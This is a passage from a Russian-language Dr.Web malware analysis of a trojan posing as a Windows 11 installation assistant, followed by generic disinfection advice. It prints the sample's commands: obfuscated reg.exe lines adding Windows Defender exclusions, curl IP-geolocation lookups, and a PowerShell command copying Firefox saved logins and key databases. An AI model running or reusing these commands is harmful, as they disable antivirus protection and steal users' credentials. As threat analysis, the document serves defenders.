  • %APPDATA%\windows11installationassistant\icons\classic\is-08h3c.tmp в %APPDATA%\windows11installationassistant\icons\classic\d13.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-tkqk1.tmp в %APPDATA%\windows11installationassistant\icons\classic\d12a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-np2ek.tmp в %APPDATA%\windows11installationassistant\icons\classic\d12.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-kl65c.tmp в %APPDATA%\windows11installationassistant\icons\classic\d11a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-n3rg0.tmp в %APPDATA%\windows11installationassistant\icons\classic\d11.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-c5vn5.tmp в %APPDATA%\windows11installationassistant\icons\classic\d10a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-pj1gl.tmp в %APPDATA%\windows11installationassistant\icons\classic\d10.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-p1kud.tmp в %APPDATA%\windows11installationassistant\icons\classic\d1.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ump21.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d15.ico
  • %APPDATA%\windows11installationassistant\images\is-ccba8.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@100.png
  • %APPDATA%\windows11installationassistant\images\is-h5vkm.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@325.png
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ro2vs.tmp в %APPDATA%\windows11installationassistant\icons\new blue\prev.ico
  • %APPDATA%\windows11installationassistant\images\is-4ve2r.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@300.png
  • %APPDATA%\windows11installationassistant\images\is-r24rh.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@250.png
  • C:\tmp\is-90oit.tmp в C:\tmp\pbd.dll
  • %APPDATA%\windows11installationassistant\icons\classic\is-spdal.tmp в %APPDATA%\windows11installationassistant\icons\classic\d7a.ico
  • %APPDATA%\windows11installationassistant\icons\classic\is-341a8.tmp в %APPDATA%\windows11installationassistant\icons\classic\d7.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-ajngq.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d20a.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-p26uv.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d20.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-b69c2.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d2.ico
  • %APPDATA%\windows11installationassistant\icons\new blue\is-itkth.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d1a.ico
  • C:\tmp\is-c33bl.tmp в C:\tmp\ico1.ico
  • %APPDATA%\windows11installationassistant\images\is-vj72h.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@225.png
  • %APPDATA%\windows11installationassistant\images\is-fie25.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@200.png
  • %APPDATA%\windows11installationassistant\images\is-ma64u.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@175.png
  • %APPDATA%\windows11installationassistant\images\is-gf67b.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@150.png
  • %APPDATA%\windows11installationassistant\images\is-o0gg4.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@350.png
  • %APPDATA%\windows11installationassistant\images\is-a1gfs.tmp в %APPDATA%\windows11installationassistant\images\dropdownicon@125.png
  • %APPDATA%\windows11installationassistant\images\is-e23co.tmp в %APPDATA%\windows11installationassistant\images\createfolderfence@200.png
  • %APPDATA%\windows11installationassistant\images\is-vukj4.tmp в %APPDATA%\windows11installationassistant\images\createfolderfence@175.png
  • %APPDATA%\windows11installationassistant\images\is-geot8.tmp в %APPDATA%\windows11installationassistant\images\createfolderfence@150.png
  • %APPDATA%\windows11installationassistant\images\is-f2glg.tmp в %APPDATA%\windows11installationassistant\images\createfolderfence@125.png
  • %APPDATA%\windows11installationassistant\images\is-i3e57.tmp в %APPDATA%\windows11installationassistant\images\createfolderfence@100.png
  • %APPDATA%\windows11installationassistant\images\is-crji7.tmp в %APPDATA%\windows11installationassistant\images\createfence@200.png
  • %APPDATA%\windows11installationassistant\images\is-lm64r.tmp в %APPDATA%\windows11installationassistant\images\createfence@175.png
  • %APPDATA%\windows11installationassistant\images\is-7nn97.tmp в %APPDATA%\windows11installationassistant\images\createfence@150.png
  • %APPDATA%\windows11installationassistant\images\is-2lt2i.tmp в %APPDATA%\windows11installationassistant\images\createfence@125.png
  • %TEMP%\is-is2pc.tmp\temp\is-ukirs.tmp в %TEMP%\is-is2pc.tmp\temp\r.exe
  • %APPDATA%\windows11installationassistant\images\is-vj050.tmp в %APPDATA%\windows11installationassistant\images\createfence@100.png
  • %APPDATA%\windows11installationassistant\images\is-v4bul.tmp в %APPDATA%\windows11installationassistant\images\closeicon@150.png
  • %APPDATA%\windows11installationassistant\images\is-intt1.tmp в %APPDATA%\windows11installationassistant\images\closeicon@125.png
  • %APPDATA%\windows11installationassistant\images\is-ri6rc.tmp в %APPDATA%\windows11installationassistant\images\closeicon@100.png
  • %APPDATA%\windows11installationassistant\icons\new blue\is-k4ngt.tmp в %APPDATA%\windows11installationassistant\icons\new blue\d9a.ico
  • %APPDATA%\windows11installationassistant\images\is-gk6e3.tmp в %APPDATA%\windows11installationassistant\images\pagerbullets@100.png
Подменяет следующие файлы
  • %TEMP%\is-is2pc.tmp\temp\.cmd
Другое
Ищет следующие окна
  • ClassName: '' WindowName: ''
Создает и запускает на исполнение
  • '%TEMP%\is-d4hvt.tmp\<Имя файла>.tmp' /SL5="$B0238,18788298,203776,<Полный путь к файлу>"
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /Sw:0 reg.eXe add "hKLm\SOfTware\MiCrosofT\wIndOws defender\eXclusiONS\eXTeNsionS" /V CMd /T reG_dWOrd /d 0 /f
  • '%TEMP%\is-l0l3e.tmp\<Имя файла>.tmp' /SL5="$150146,18788298,203776,<Полный путь к файлу>" /verysilent /sp-
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /TI/ /sW:0 reG.eXe Add "hKLm\sOFTWare\micrOsoFt\wINdoWS deFender\exCLusIONs\pAthS" /v "<DRIVERS>\etc\hOSTS" /T "reG_dword" /d "0" /F
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /sW:0 reG.exe Add "hKlm\soFtwAre\MICrosOFt\wiNdoWS defender\eXcLuSIons\eXtensIOnS" /v dLl /t reg_dword /d 0 /f
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /sW:0 reG.exe Add "hKLm\SoftwAre\mIcroSofT\wINdowS deFeNder\exclusioNS\extenSIoNS" /v sCr /t reg_dWord /d 0 /F
  • '%APPDATA%\windows11installationassistant\windows11instaiiation.scr'
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /TI/ /sW:0 reG.exe Add "hKlm\soFtwAre\MICrosOFt\wiNdoWS defender\eXcLuSIons\eXtensIOnS" /v dLl /t reg_dword /d 0 /f
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /TI/ /sW:0 reG.exe Add "hKLm\SoftwAre\mIcroSofT\wINdowS deFeNder\exclusioNS\extenSIoNS" /v sCr /t reg_dWord /d 0 /F
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /SW:0 reG.exe add "hklm\SoFtwAre\MIcrosoft\WindoWs deFeNder\eXclUsiONS\eXteNSIOnS" /V exe /t reG_dwOrd /d 0 /F
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /sW:0 reG.eXe Add "hKLm\sOFTWare\micrOsoFt\wINdoWS deFender\exCLusIONs\pAthS" /v "<DRIVERS>\etc\hOSTS" /T "reG_dword" /d "0" /F
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /TI/ /SW:0 reG.exe add "hklm\SoFtwAre\MIcrosoft\WindoWs deFeNder\eXclUsiONS\eXteNSIOnS" /V exe /t reG_dwOrd /d 0 /F
  • '%TEMP%\is-is2pc.tmp\temp\r.exe' /TI/ /Sw:0 reg.eXe add "hKLm\SOfTware\MiCrosofT\wIndOws defender\eXclusiONS\eXTeNsionS" /V CMd /T reG_dWOrd /d 0 /f
  • '<SYSTEM32>\reg.exe' Add "hKLm\SoftwAre\mIcroSofT\wINdowS deFeNder\exclusioNS\extenSIoNS" /v sCr /t reg_dWord /d 0 /F' (со скрытым окном)
  • '<SYSTEM32>\reg.exe' Add "hKLm\sOFTWare\micrOsoFt\wINdoWS deFender\exCLusIONs\pAthS" /v "<DRIVERS>\etc\hOSTS" /T "reG_dword" /d "0" /F' (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "hklm\SoFtwAre\MIcrosoft\WindoWs deFeNder\eXclUsiONS\eXteNSIOnS" /V exe /t reG_dwOrd /d 0 /F' (со скрытым окном)
  • '<SYSTEM32>\reg.exe' Add "hKlm\soFtwAre\MICrosOFt\wiNdoWS defender\eXcLuSIons\eXtensIOnS" /v dLl /t reg_dword /d 0 /f' (со скрытым окном)
  • '%WINDIR%\syswow64\rundll32.exe' C:\tmp\pbd.dll, Uaby' (со скрытым окном)
  • '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-IS2PC.tmp\temp\.cmd""' (со скрытым окном)
  • '%WINDIR%\syswow64\taskkill.exe' /f /im "Windows11InstaIIation.scr"' (со скрытым окном)
  • '<Полный путь к файлу>' /verysilent /sp-' (со скрытым окном)
  • '%APPDATA%\windows11installationassistant\windows11instaiiation.scr' ' (со скрытым окном)
  • '<SYSTEM32>\reg.exe' add "hKLm\SOfTware\MiCrosofT\wIndOws defender\eXclusiONS\eXTeNsionS" /V CMd /T reG_dWOrd /d 0 /f' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\657o3m999d0swns1285495.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP...' (со скрытым окном)
Запускает на исполнение
  • '%WINDIR%\syswow64\rundll32.exe' C:\tmp\pbd.dll, Uaby
  • '<SYSTEM32>\rundll32.exe' C:\tmp\pbd.dll, Uaby
  • '%WINDIR%\syswow64\cmd.exe' /C ""%TEMP%\is-IS2PC.tmp\temp\.cmd""
  • '<SYSTEM32>\reg.exe' Add "hKlm\soFtwAre\MICrosOFt\wiNdoWS defender\eXcLuSIons\eXtensIOnS" /v dLl /t reg_dword /d 0 /f
  • '<SYSTEM32>\reg.exe' Add "hKLm\SoftwAre\mIcroSofT\wINdowS deFeNder\exclusioNS\extenSIoNS" /v sCr /t reg_dWord /d 0 /F
  • '<SYSTEM32>\reg.exe' add "hKLm\SOfTware\MiCrosofT\wIndOws defender\eXclusiONS\eXTeNsionS" /V CMd /T reG_dWOrd /d 0 /f
  • '<SYSTEM32>\reg.exe' add "hklm\SoFtwAre\MIcrosoft\WindoWs deFeNder\eXclUsiONS\eXteNSIOnS" /V exe /t reG_dwOrd /d 0 /F
  • '%WINDIR%\syswow64\cmd.exe' /c cUrL -s ipINFO.io/Ip
  • '<SYSTEM32>\reg.exe' Add "hKLm\sOFTWare\micrOsoFt\wINdoWS deFender\exCLusIONs\pAthS" /v "<DRIVERS>\etc\hOSTS" /T "reG_dword" /d "0" /F
  • '%WINDIR%\syswow64\cmd.exe' /c cuRL -s IPINfo.Io/city
  • '%WINDIR%\syswow64\cmd.exe' /c cUrl -s IPiNfo.io/country
  • '%WINDIR%\syswow64\attrib.exe' +s +H %APPDATA%\windows11installationassistant\.cmD
  • '%WINDIR%\syswow64\attrib.exe' +s +h %APPDATA%\windows11installationassistant\.vbs
  • '<SYSTEM32>\dxdiag.exe' /x %LOCALAPPDATA%\Orange Group\Windows 11 Compatibility Checker\dxv.xml
  • '%WINDIR%\syswow64\dxdiag.exe' /x %LOCALAPPDATA%\Orange Group\Windows 11 Compatibility Checker\dxv.xml
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\logins.json\" \"%TEMP%\657o3m999d0swns1285495.tmp\" -Force;cpi \"%APPDATA%\Mozilla\Firefox\Profiles/gn7ryp3k.default\key3.db\" \"%TEMP...

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке